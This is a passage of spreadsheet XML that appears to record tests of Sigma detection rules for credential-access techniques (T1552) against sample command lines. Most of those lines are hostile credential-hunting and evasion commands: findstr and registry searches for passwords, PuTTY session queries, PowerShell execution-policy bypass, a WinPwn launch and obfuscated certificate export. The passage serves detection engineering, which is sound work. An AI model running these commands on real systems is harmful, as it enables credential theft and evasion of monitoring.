      <c r="J461" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K461" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="462" ht="15.75" customHeight="1" s="42">
      <c r="A462" s="44" t="inlineStr">
        <is>
          <t>t1552</t>
        </is>
      </c>
      <c r="B462" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_eventlog_content_recon</t>
        </is>
      </c>
      <c r="C462" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious EventLog Recon Activity Using Log Query Utilities</t>
        </is>
      </c>
      <c r="D462" s="44" t="inlineStr">
        <is>
          <t>beaa66d6-aa1b-4e3c-80f5-e0145369bfaf</t>
        </is>
      </c>
      <c r="E462" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "[System.Diagnostics.Eventing.Reader.EventLogReader]::new((New-Object System.Diagnostics.Eventing.Reader.EventLogQuery('Microsoft-Windows-TerminalServices-LocalSessionManager/Operational', [System.Diagnostics.Eventing.Reader.PathType]::LogName))).ReadEvent()"</t>
        </is>
      </c>
      <c r="F462" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G462" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H462" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I462" s="43" t="n"/>
      <c r="J462" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K462" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="463" ht="15.75" customHeight="1" s="42">
      <c r="A463" s="44" t="n"/>
      <c r="B463" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C463" s="44" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D463" s="44" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E463" s="44" t="inlineStr">
        <is>
          <t>findstr.exe -si "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F463" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G463" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H463" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I463" s="43" t="n"/>
      <c r="J463" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K463" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="464" ht="15.75" customHeight="1" s="42">
      <c r="A464" s="44" t="n"/>
      <c r="B464" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C464" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D464" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E464" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F464" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G464" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H464" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I464" s="43" t="n"/>
      <c r="J464" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K464" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="465" ht="15.75" customHeight="1" s="42">
      <c r="A465" s="44" t="n"/>
      <c r="B465" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C465" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D465" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E465" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F465" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G465" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H465" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I465" s="43" t="n"/>
      <c r="J465" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K465" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="466" ht="15.75" customHeight="1" s="42">
      <c r="A466" s="44" t="n"/>
      <c r="B466" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C466" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D466" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E466" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F466" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G466" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H466" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I466" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J466" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K466" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="467" ht="15.75" customHeight="1" s="42">
      <c r="A467" s="44" t="n"/>
      <c r="B467" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C467" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D467" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E467" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F467" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G467" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H467" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I467" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J467" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K467" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="468" ht="15.75" customHeight="1" s="42">
      <c r="A468" s="44" t="n"/>
      <c r="B468" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C468" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D468" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E468" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F468" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G468" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H468" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I468" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J468" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K468" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="469" ht="15.75" customHeight="1" s="42">
      <c r="A469" s="44" t="n"/>
      <c r="B469" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C469" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D469" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E469" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F469" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G469" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H469" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I469" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J469" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K469" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="470" ht="15.75" customHeight="1" s="42">
      <c r="A470" s="44" t="n"/>
      <c r="B470" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C470" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D470" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E470" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F470" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G470" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H470" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I470" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J470" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K470" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="471" ht="15.75" customHeight="1" s="42">
      <c r="A471" s="43" t="n"/>
      <c r="B471" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_automated_collection</t>
        </is>
      </c>
      <c r="C471" s="44" t="inlineStr">
        <is>
          <t>Automated Collection Command Prompt</t>
        </is>
      </c>
      <c r="D471" s="44" t="inlineStr">
        <is>
          <t>f576a613-2392-4067-9d1a-9345fb58d8d1</t>
        </is>
      </c>
      <c r="E471" s="43" t="inlineStr">
        <is>
          <t>findstr.exe /S ".docx" C:\Users\*.*</t>
        </is>
      </c>
      <c r="F471" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G471" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H471" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I471" s="43" t="n"/>
      <c r="J471" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K471" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="472" ht="15.75" customHeight="1" s="42">
      <c r="A472" s="43" t="n"/>
      <c r="B472" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_automated_collection</t>
        </is>
      </c>
      <c r="C472" s="44" t="inlineStr">
        <is>
          <t>Automated Collection Command Prompt</t>
        </is>
      </c>
      <c r="D472" s="44" t="inlineStr">
        <is>
          <t>f576a613-2392-4067-9d1a-9345fb58d8d1</t>
        </is>
      </c>
      <c r="E472" s="43" t="inlineStr">
        <is>
          <t>for /r C:\Users\ %i in (*.doc*) do @echo %i</t>
        </is>
      </c>
      <c r="F472" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G472" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H472" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I472" s="43" t="n"/>
      <c r="J472" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K472" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="473" ht="15.75" customHeight="1" s="42">
      <c r="A473" s="43" t="inlineStr">
        <is>
          <t>t1552.002</t>
        </is>
      </c>
      <c r="B473" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_enumeration_for_credentials_in_registry</t>
        </is>
      </c>
      <c r="C473" s="44" t="inlineStr">
        <is>
          <t>Enumeration for Credentials in Registry</t>
        </is>
      </c>
      <c r="D473" s="44" t="inlineStr">
        <is>
          <t>e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1</t>
        </is>
      </c>
      <c r="E473" s="43" t="inlineStr">
        <is>
          <t>reg  query HKCU /f password /t REG_SZ /s</t>
        </is>
      </c>
      <c r="F473" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G473" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H473" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I473" s="43" t="inlineStr">
        <is>
          <t>Enumeration for Credentials in Registry (e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1)</t>
        </is>
      </c>
      <c r="J473" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K473" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="474" ht="15.75" customHeight="1" s="42">
      <c r="A474" s="43" t="inlineStr">
        <is>
          <t>t1552.002</t>
        </is>
      </c>
      <c r="B474" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_enumeration_for_credentials_in_registry</t>
        </is>
      </c>
      <c r="C474" s="44" t="inlineStr">
        <is>
          <t>Enumeration for Credentials in Registry</t>
        </is>
      </c>
      <c r="D474" s="44" t="inlineStr">
        <is>
          <t>e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1</t>
        </is>
      </c>
      <c r="E474" s="43" t="inlineStr">
        <is>
          <t>reg "query" HKCU /f password /t REG_SZ /s</t>
        </is>
      </c>
      <c r="F474" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G474" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H474" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I474" s="43" t="n"/>
      <c r="J474" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K474" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="475" ht="15.75" customHeight="1" s="42">
      <c r="A475" s="43" t="inlineStr">
        <is>
          <t>t1552.002</t>
        </is>
      </c>
      <c r="B475" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_enumeration_for_credentials_in_registry</t>
        </is>
      </c>
      <c r="C475" s="44" t="inlineStr">
        <is>
          <t>Enumeration for Credentials in Registry</t>
        </is>
      </c>
      <c r="D475" s="44" t="inlineStr">
        <is>
          <t>e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1</t>
        </is>
      </c>
      <c r="E475" s="43" t="inlineStr">
        <is>
          <t>reg query HKCU -f password -t REG_SZ -s</t>
        </is>
      </c>
      <c r="F475" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G475" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H475" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I475" s="43" t="n"/>
      <c r="J475" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K475" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="476" ht="15.75" customHeight="1" s="42">
      <c r="A476" s="44" t="inlineStr">
        <is>
          <t>t1552.002</t>
        </is>
      </c>
      <c r="B476" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_enumeration_for_credentials_cli</t>
        </is>
      </c>
      <c r="C476" s="44" t="inlineStr">
        <is>
          <t>Enumeration for 3rd Party Creds From CLI</t>
        </is>
      </c>
      <c r="D476" s="44" t="inlineStr">
        <is>
          <t>87a476dc-0079-4583-a985-dee7a20a03de</t>
        </is>
      </c>
      <c r="E476" s="44" t="inlineStr">
        <is>
          <t>reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s</t>
        </is>
      </c>
      <c r="F476" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G476" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H476" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I476" s="43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J476" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K476" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="477" ht="15.75" customHeight="1" s="42">
      <c r="A477" s="44" t="inlineStr">
        <is>
          <t>t1552.002</t>
        </is>
      </c>
      <c r="B477" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_enumeration_for_credentials_cli</t>
        </is>
      </c>
      <c r="C477" s="44" t="inlineStr">
        <is>
          <t>Enumeration for 3rd Party Creds From CLI</t>
        </is>
      </c>
      <c r="D477" s="44" t="inlineStr">
        <is>
          <t>87a476dc-0079-4583-a985-dee7a20a03de</t>
        </is>
      </c>
      <c r="E477" s="44" t="inlineStr">
        <is>
          <t>reg query HKCU\Software\SimonTatham\PuTTY""\Sessions /t REG_SZ /s</t>
        </is>
      </c>
      <c r="F477" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G477" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H477" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I477" s="43" t="n"/>
      <c r="J477" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K477" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="478" ht="15.75" customHeight="1" s="42">
      <c r="A478" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B478" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C478" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D478" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E478" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$cmd = 'Export-' + 'PfxCertificate'; &amp; $cmd -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F478" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G478" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H478" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I478" s="43" t="n"/>
      <c r="J478" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K478" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="479" ht="15.75" customHeight="1" s="42">
      <c r="A479" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B479" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C479" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D479" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E479" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$cmd = 'Export-' + 'PfxCertificate'; &amp; $cmd -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F479" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G479" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H479" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I479" s="44" t="n"/>
      <c r="J479" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K479" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="480" ht="15.75" customHeight="1" s="42">
      <c r="A480" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B480" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C480" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D480" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E480" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAND "$cmd = 'Export-' + 'PfxCertificate'; &amp; $cmd -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F480" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G480" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H480" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I480" s="43" t="n"/>
      <c r="J480" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K480" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="481" ht="15.75" customHeight="1" s="42">
      <c r="A481" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B481" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C481" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D481" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E481" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMANd "$cmd = 'Export-' + 'PfxCertificate'; &amp; $cmd -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F481" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G481" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H481" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I481" s="43" t="n"/>
      <c r="J481" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K481" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="482" ht="15.75" customHeight="1" s="42">
      <c r="A482" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B482" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C482" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D482" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E482" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmanD "$cmd = 'Export-' + 'PfxCertificate'; &amp; $cmd -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F482" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G482" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H482" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I482" s="43" t="n"/>
      <c r="J482" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K482" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="483" ht="15.75" customHeight="1" s="42">
      <c r="A483" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B483" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C483" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D483" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E483" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; 'Export-PfxCertificate' -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F483" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G483" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H483" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I483" s="43" t="n"/>
      <c r="J483" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K483" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="484" ht="15.75" customHeight="1" s="42">
      <c r="A484" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B484" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C484" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D484" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E484" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMand "&amp; 'Export-PfxCertificate' -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F484" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G484" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H484" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I484" s="43" t="n"/>
      <c r="J484" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K484" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="485" ht="15.75" customHeight="1" s="42">
      <c r="A485" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B485" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C485" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D485" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E485" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; 'Export-PfxCertificate' -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F485" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G485" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H485" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I485" s="44" t="n"/>
      <c r="J485" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K485" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="486" ht="15.75" customHeight="1" s="42">
      <c r="A486" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B486" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C486" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D486" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E486" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmaND "&amp; 'Export-PfxCertificate' -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F486" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G486" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H486" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I486" s="43" t="n"/>
      <c r="J486" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K486" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="487" ht="15.75" customHeight="1" s="42">
      <c r="A487" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B487" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C487" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D487" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E487" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommAnD "&amp; 'Export-PfxCertificate' -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F487" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G487" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H487" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I487" s="44" t="n"/>
      <c r="J487" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K487" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="488" ht="15.75" customHeight="1" s="42">
      <c r="A488" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B488" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C488" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D488" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E488" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-ChildItem -Path Cert:\CurrentUser\My | Export-PfxCertificatet-FilePath C:\\temp\\cert.pfx\"</t>
        </is>
      </c>
      <c r="F488" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G488" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H488" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I488" s="44" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools (213d6a77-3d55-4ce8-ba74-fcfef741974e)</t>
        </is>
      </c>
      <c r="J488" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K488" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="489" ht="15.75" customHeight="1" s="42">
      <c r="A489" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B489" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C489" s="44" t="inlineStr">
